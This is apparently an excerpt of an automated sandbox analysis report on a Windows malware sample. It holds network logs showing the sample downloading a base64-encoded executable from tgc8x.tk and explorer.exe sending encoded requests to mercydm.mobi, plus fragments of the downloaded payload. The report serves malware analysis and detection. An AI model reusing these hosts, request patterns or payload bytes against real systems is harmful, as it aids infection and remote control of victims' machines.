.reloc	0x16000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x14164	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096
RT_GROUP_ICON	0x1520c	0x14	data
RT_VERSION	0x15220	0x33c	data
RT_MANIFEST	0x1555c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
50.115.174.192192.168.2.6443497042018856 11/03/22-12:39:59.450093	TCP	2018856	ET TROJAN Windows executable base64 encoded	443	49704	50.115.174.192	192.168.2.6
192.168.2.68.8.8.859575532012811 11/03/22-12:39:56.025984	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	59575	53	192.168.2.6	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:39:56.396153927 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:56.396225929 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:56.396327019 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:56.450129986 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:56.450177908 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:56.835751057 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:56.835985899 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:56.848099947 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:56.848124027 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:56.848771095 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:56.919364929 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:57.640667915 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:57.640702009 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.819936037 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.819999933 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.820017099 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.820031881 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.820125103 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:57.820158958 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.872545004 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:57.997368097 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.997410059 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.997458935 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.997530937 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:57.997567892 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.997567892 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:57.997586012 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.997622967 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.997632027 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:57.997632980 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:57.997662067 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:57.997689962 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.175142050 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.175272942 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.175385952 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.175427914 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.175431013 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.175487995 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.175502062 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.175551891 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.175565958 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.175580025 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.175621033 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.175745010 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.175857067 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.353627920 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.353775024 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.353818893 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.353848934 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.353869915 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.353893995 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.354007959 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.354073048 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.354207039 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.354294062 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.354432106 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.354499102 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.354631901 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.354705095 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.533330917 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.533480883 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.533509970 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.533618927 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.533631086 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.533655882 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.533679962 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.533711910 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.533741951 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.533799887 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.533857107 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.533926964 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.533982992 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.534043074 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.534089088 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.534158945 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.534224987 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.534296036 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.534343958 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.534409046 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.534466028 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.534524918 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.712263107 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.712383032 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.712660074 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.712667942 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.712697983 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.712798119 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.712939024 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.713038921 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.713177919 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.713260889 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.713460922 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.713546991 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.713736057 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.713886976 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.713890076 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.713900089 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.713972092 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.713978052 CET	443	49701	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.714051962 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.720257044 CET	49701	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.726160049 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.726241112 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:58.726394892 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.727183104 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:58.727216005 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.093213081 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.102577925 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:59.102621078 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.450247049 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.450318098 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.450504065 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:59.450537920 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.627795935 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.627876043 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.627973080 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:59.628011942 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.628027916 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.628040075 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:59.628051043 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:59.628067970 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:59.628545046 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.628642082 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:59.628653049 CET	443	49704	50.115.174.192	192.168.2.6
Nov 3, 2022 12:39:59.628700972 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:39:59.640074015 CET	49704	443	192.168.2.6	50.115.174.192
Nov 3, 2022 12:41:36.192605972 CET	49705	80	192.168.2.6	34.102.136.180
Nov 3, 2022 12:41:36.211533070 CET	80	49705	34.102.136.180	192.168.2.6
Nov 3, 2022 12:41:36.211769104 CET	49705	80	192.168.2.6	34.102.136.180
Nov 3, 2022 12:41:36.211915970 CET	49705	80	192.168.2.6	34.102.136.180
Nov 3, 2022 12:41:36.230607986 CET	80	49705	34.102.136.180	192.168.2.6
Nov 3, 2022 12:41:36.397337914 CET	80	49705	34.102.136.180	192.168.2.6
Nov 3, 2022 12:41:36.397375107 CET	80	49705	34.102.136.180	192.168.2.6
Nov 3, 2022 12:41:36.397663116 CET	49705	80	192.168.2.6	34.102.136.180
Nov 3, 2022 12:41:36.397664070 CET	49705	80	192.168.2.6	34.102.136.180
Nov 3, 2022 12:41:36.416469097 CET	80	49705	34.102.136.180	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:39:56.025984049 CET	59575	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:39:56.357557058 CET	53	59575	8.8.8.8	192.168.2.6
Nov 3, 2022 12:41:36.152439117 CET	58595	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:41:36.184751987 CET	53	58595	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2022 12:39:56.025984049 CET	192.168.2.6	8.8.8.8	0x1cce	Standard query (0)	tgc8x.tk	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:41:36.152439117 CET	192.168.2.6	8.8.8.8	0x7240	Standard query (0)	www.mercydm.mobi	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 3, 2022 12:39:56.357557058 CET	8.8.8.8	192.168.2.6	0x1cce	No error (0)	tgc8x.tk		50.115.174.192	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:41:36.184751987 CET	8.8.8.8	192.168.2.6	0x7240	No error (0)	www.mercydm.mobi	mercydm.mobi		CNAME (Canonical name)	IN (0x0001)	false
Nov 3, 2022 12:41:36.184751987 CET	8.8.8.8	192.168.2.6	0x7240	No error (0)	mercydm.mobi		34.102.136.180	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tgc8x.tk

www.mercydm.mobi

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49701	50.115.174.192	443	C:\Users\user\Desktop\U8RYIwIvfK.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49704	50.115.174.192	443	C:\Users\user\Desktop\U8RYIwIvfK.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49705	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:41:36.211915970 CET	387	OUT	GET /zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt HTTP/1.1 Host: www.mercydm.mobi Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 3, 2022 12:41:36.397337914 CET	387	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 03 Nov 2022 11:41:36 GMT Content-Type: text/html Content-Length: 291 ETag: "635276ab-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49701	50.115.174.192	443	C:\Users\user\Desktop\U8RYIwIvfK.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-03 11:39:57 UTC	0	OUT	GET /tt/ptrr.txt HTTP/1.1 Host: tgc8x.tk Connection: Keep-Alive
2022-11-03 11:39:57 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 03 Nov 2022 11:39:56 GMT Server: Apache Last-Modified: Mon, 31 Oct 2022 22:25:22 GMT Accept-Ranges: bytes Content-Length: 252588 Connection: close Content-Type: text/plain
2022-11-03 11:39:57 UTC	0	IN	Data Raw: 54 56 70 46 55 75 67 41 41 41 41 41 57 49 50 6f 43 59 76 49 67 38 41 38 69 77 41 44 77 59 50 41 4b 41 4d 49 2f 2b 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 43 72 2f 41 6a 71 37 35 31 6d 75 65 2b 64 5a 72 6e 76 6e 57 61 35 39 41 44 4e 75 61 6d 64 5a 72 6e 30 41 50 69 35 37 4a 31 6d 75 66 51 41 2b 37 6e 75 6e 57 61 35 55 6d 6c 6a 61 4f 2b 64 5a 72 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: TVpFUugAAAAAWIPoCYvIg8A8iwADwYPAKAMI/+GQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACr/Ajq751mue+dZrnvnWa59ADNuamdZrn0APi57J1mufQA+7nunWa5UmljaO+dZrkAAAAAAAAAAAAAAAAAAAA
2022-11-03 11:39:57 UTC	8	IN	Data Raw: 2f 2f 30 44 4a 79 59 6e 48 68 54 7a 37 2f 2f 2b 48 66 58 33 36 78 34 56 41 2b 2f 2f 2f 46 66 72 36 37 38 65 46 52 50 76 2f 2f 2b 74 5a 57 62 4c 48 68 55 6a 37 2f 2f 2f 4a 52 30 65 4f 78 34 56 4d 2b 2f 2f 2f 43 2f 44 77 2b 38 65 46 55 50 76 2f 2f 2b 79 74 72 55 48 48 68 56 54 37 2f 2f 39 6e 31 4e 53 7a 78 34 56 59 2b 2f 2f 2f 2f 61 4b 69 58 38 65 46 58 50 76 2f 2f 2b 71 76 72 30 58 48 68 57 44 37 2f 2f 2b 2f 6e 4a 77 6a 78 34 56 6b 2b 2f 2f 2f 39 36 53 6b 55 38 65 46 61 50 76 2f 2f 35 5a 79 63 75 54 48 68 57 7a 37 2f 2f 39 62 77 4d 43 62 78 34 56 77 2b 2f 2f 2f 77 72 65 33 64 63 65 46 64 50 76 2f 2f 78 7a 39 2f 65 48 48 68 58 6a 37 2f 2f 2b 75 6b 35 4d 39 78 34 56 38 2b 2f 2f 2f 61 69 59 6d 54 4d 65 46 67 50 76 2f 2f 31 6f 32 4e 6d 7a 48 68 59 54 37 2f 2f Data Ascii: //0DJyYnHhTz7//+HfX36x4VA+///Ffr678eFRPv//+tZWbLHhUj7///JR0eOx4VM+///C/Dw+8eFUPv//+ytrUHHhVT7//9n1NSzx4VY+////aKiX8eFXPv//+qvr0XHhWD7//+/nJwjx4Vk+///96SkU8eFaPv//5ZycuTHhWz7//9bwMCbx4Vw+///wre3dceFdPv//xz9/eHHhXj7//+uk5M9x4V8+///aiYmTMeFgPv//1o2NmzHhYT7//
2022-11-03 11:39:57 UTC	15	IN	Data Raw: 36 47 49 48 69 2f 77 41 41 41 41 2b 32 56 4a 59 46 4d 38 71 4c 31 34 48 69 2f 77 41 41 41 49 74 55 6c 67 53 42 34 67 44 2f 41 41 41 7a 79 6a 4e 49 2f 49 73 51 4d 39 47 4a 53 42 79 4c 53 41 51 7a 79 6f 6c 51 49 49 74 51 43 44 50 52 69 55 67 6b 69 56 41 6f 67 2f 73 47 44 34 53 4a 41 41 41 41 69 38 72 42 2b 52 69 42 34 66 38 41 41 41 43 4c 54 49 34 45 69 39 72 42 2b 78 43 42 34 2f 38 41 41 41 43 4c 58 4a 34 45 67 65 45 41 41 50 2f 2f 67 65 4d 41 41 50 38 41 77 65 45 49 4d 38 75 4c 32 73 48 37 43 49 48 6a 2f 77 41 41 41 49 74 63 6e 67 53 42 34 76 38 41 41 41 41 50 74 6c 53 57 42 59 48 6a 41 50 38 41 41 44 50 4c 69 31 30 51 4d 38 6f 7a 53 41 79 4c 55 42 41 7a 30 59 6c 49 4c 49 74 49 46 44 50 4b 69 55 67 30 4d 38 39 44 69 56 41 77 69 55 67 34 67 38 41 67 69 56 Data Ascii: 6GIHi/wAAAA+2VJYFM8qL14Hi/wAAAItUlgSB4gD/AAAzyjNI/IsQM9GJSByLSAQzyolQIItQCDPRiUgkiVAog/sGD4SJAAAAi8rB+RiB4f8AAACLTI4Ei9rB+xCB4/8AAACLXJ4EgeEAAP//geMAAP8AweEIM8uL2sH7CIHj/wAAAItcngSB4v8AAAAPtlSWBYHjAP8AADPLi10QM8ozSAyLUBAz0YlILItIFDPKiUg0M89DiVAwiUg4g8AgiV
2022-11-03 11:39:58 UTC	23	IN	Data Raw: 51 56 75 6a 32 42 77 45 41 69 2f 43 44 78 44 41 37 38 33 52 73 61 50 34 44 41 41 43 4e 6a 61 4c 37 2f 2f 38 7a 77 46 4e 52 5a 6f 6d 46 6f 50 76 2f 2f 2b 6a 69 64 77 45 41 56 2b 68 4d 65 67 45 41 41 38 43 44 78 42 41 39 2f 41 4d 41 41 48 63 2f 55 49 32 56 6f 50 76 2f 2f 31 64 53 36 45 4a 33 41 51 43 44 78 41 79 4e 56 65 43 4e 68 61 44 37 2f 2f 2b 35 46 41 51 41 41 46 4b 4a 58 65 44 48 52 65 51 44 41 41 41 41 69 55 58 6f 69 56 33 73 5a 6f 6c 4e 38 49 6c 64 38 6f 6c 64 39 6f 6c 64 2b 76 2f 57 58 6c 39 62 69 2b 56 64 77 35 73 6b 37 38 73 79 2b 39 67 4c 78 4a 4a 56 69 2b 79 44 37 43 68 57 69 33 55 49 69 34 61 67 43 77 41 41 56 7a 50 2f 61 50 64 65 46 4d 78 58 56 31 43 4e 54 68 78 52 69 58 33 77 69 58 33 30 36 45 59 48 41 51 43 44 78 42 53 4a 52 66 77 37 78 33 Data Ascii: QVuj2BwEAi/CDxDA783RsaP4DAACNjaL7//8zwFNRZomFoPv//+jidwEAV+hMegEAA8CDxBA9/AMAAHc/UI2VoPv//1dS6EJ3AQCDxAyNVeCNhaD7//+5FAQAAFKJXeDHReQDAAAAiUXoiV3sZolN8Ild8old9old+v/WXl9bi+Vdw5sk78sy+9gLxJJVi+yD7ChWi3UIi4agCwAAVzP/aPdeFMxXV1CNThxRiX3wiX306EYHAQCDxBSJRfw7x3
2022-11-03 11:39:58 UTC	31	IN	Data Raw: 45 42 46 44 6f 46 57 41 42 41 47 6f 41 61 68 4f 4e 6a 65 7a 39 2f 2f 39 52 56 75 68 30 37 41 41 41 61 67 42 71 46 59 48 48 34 45 6b 41 41 46 64 57 36 47 50 73 41 41 43 44 78 43 79 46 77 48 51 4d 57 31 2b 34 41 51 41 41 41 46 36 4c 35 56 33 44 57 31 38 7a 77 46 36 4c 35 56 33 44 58 7a 50 41 58 6f 76 6c 58 63 4f 4b 66 39 54 72 55 55 70 52 47 52 6f 38 30 64 47 43 6b 58 4e 56 69 2b 79 44 37 46 52 58 69 33 30 4d 67 4c 39 41 32 42 38 41 54 51 2b 46 37 67 41 41 41 49 43 2f 34 45 6b 41 41 41 42 54 6a 5a 2f 67 53 51 41 41 44 34 54 5a 41 41 41 41 67 33 38 6f 41 41 2b 45 7a 77 41 41 41 49 4e 2f 55 41 41 50 68 4d 55 41 41 41 42 57 69 33 55 49 61 67 42 71 46 56 4e 57 36 4f 4c 72 41 41 43 44 78 42 43 46 77 48 56 43 6a 59 64 41 32 42 38 41 69 59 5a 63 43 77 41 41 69 30 Data Ascii: EBFDoFWABAGoAahONjez9//9RVuh07AAAagBqFYHH4EkAAFdW6GPsAACDxCyFwHQMW1+4AQAAAF6L5V3DW18zwF6L5V3DXzPAXovlXcOKf9TrUUpRGRo80dGCkXNVi+yD7FRXi30MgL9A2B8ATQ+F7gAAAIC/4EkAAABTjZ/gSQAAD4TZAAAAg38oAA+EzwAAAIN/UAAPhMUAAABWi3UIagBqFVNW6OLrAACDxBCFwHVCjYdA2B8AiYZcCwAAi0
2022-11-03 11:39:58 UTC	39	IN	Data Raw: 41 41 6c 43 42 78 70 6f 45 41 41 42 57 36 46 37 6e 41 41 43 44 78 41 78 65 57 34 76 6c 58 63 4f 4e 6c 66 6a 2b 2f 2f 39 53 61 6e 6c 54 36 44 62 59 41 41 43 44 78 41 68 51 36 49 33 59 41 41 43 44 78 41 69 46 77 48 51 54 69 33 55 4d 61 68 54 48 52 68 67 43 41 41 41 41 36 4e 31 7a 41 51 44 72 74 59 32 46 2b 50 37 2f 2f 31 42 71 65 6c 50 6f 42 4e 67 41 41 49 50 45 43 46 44 6f 57 39 67 41 41 49 50 45 43 49 58 41 64 42 4f 4c 64 51 78 71 46 4d 64 47 47 41 4d 41 41 41 44 6f 67 58 4d 42 41 4f 75 44 6a 59 33 34 2f 76 2f 2f 55 57 70 37 55 2b 6a 53 31 77 41 41 67 38 51 49 55 4f 67 70 32 41 41 41 67 38 51 49 68 63 42 30 46 6f 74 31 44 47 6f 55 78 30 59 59 42 41 41 41 41 4f 67 6c 63 77 45 41 36 55 37 2f 2f 2f 2b 4e 6c 66 6a 2b 2f 2f 39 53 61 6e 78 54 36 4a 33 58 41 41 Data Ascii: AAlCBxpoEAABW6F7nAACDxAxeW4vlXcONlfj+//9SanlT6DbYAACDxAhQ6I3YAACDxAiFwHQTi3UMahTHRhgCAAAA6N1zAQDrtY2F+P7//1BqelPoBNgAAIPECFDoW9gAAIPECIXAdBOLdQxqFMdGGAMAAADogXMBAOuDjY34/v//UWp7U+jS1wAAg8QIUOgp2AAAg8QIhcB0Fot1DGoUx0YYBAAAAOglcwEA6U7///+Nlfj+//9SanxT6J3XAA
2022-11-03 11:39:58 UTC	47	IN	Data Raw: 31 45 6a 68 63 4d 41 46 31 44 44 68 63 4d 41 4a 31 42 6a 68 63 4d 41 4e 30 42 55 59 37 38 58 4c 6b 69 30 30 49 67 63 47 6b 42 77 41 41 55 56 5a 51 36 43 4d 66 41 41 43 4c 54 66 69 44 78 41 77 44 2f 6f 74 31 2f 45 63 37 2b 51 2b 43 58 2f 37 2f 2f 34 74 64 45 49 74 46 43 49 4e 34 48 41 42 30 45 49 74 4e 44 47 6f 43 55 31 46 51 36 49 59 4c 41 51 43 44 78 42 42 66 58 6c 75 4c 35 56 33 44 61 54 6a 6e 4e 44 47 2b 2f 54 74 2b 38 46 61 65 56 59 76 73 67 65 77 67 42 67 41 41 56 6f 74 31 43 46 64 57 36 4b 78 70 41 41 41 7a 2f 32 69 6b 41 67 41 41 6a 59 55 51 2f 50 2f 2f 56 31 43 4a 76 51 7a 38 2f 2f 2f 6f 49 6a 45 42 41 49 32 4e 44 50 7a 2f 2f 34 76 52 55 6c 61 4a 6a 6e 67 4c 41 41 44 6f 48 62 59 41 41 49 50 45 47 49 58 41 44 34 54 59 41 51 41 41 36 4b 30 70 41 51 Data Ascii: 1EjhcMAF1DDhcMAJ1BjhcMAN0BUY78XLki00IgcGkBwAAUVZQ6CMfAACLTfiDxAwD/ot1/Ec7+Q+CX/7//4tdEItFCIN4HAB0EItNDGoCU1FQ6IYLAQCDxBBfXluL5V3DaTjnNDG+/Tt+8FaeVYvsgewgBgAAVot1CFdW6KxpAAAz/2ikAgAAjYUQ/P//V1CJvQz8///oIjEBAI2NDPz//4vRUlaJjngLAADoHbYAAIPEGIXAD4TYAQAA6K0pAQ
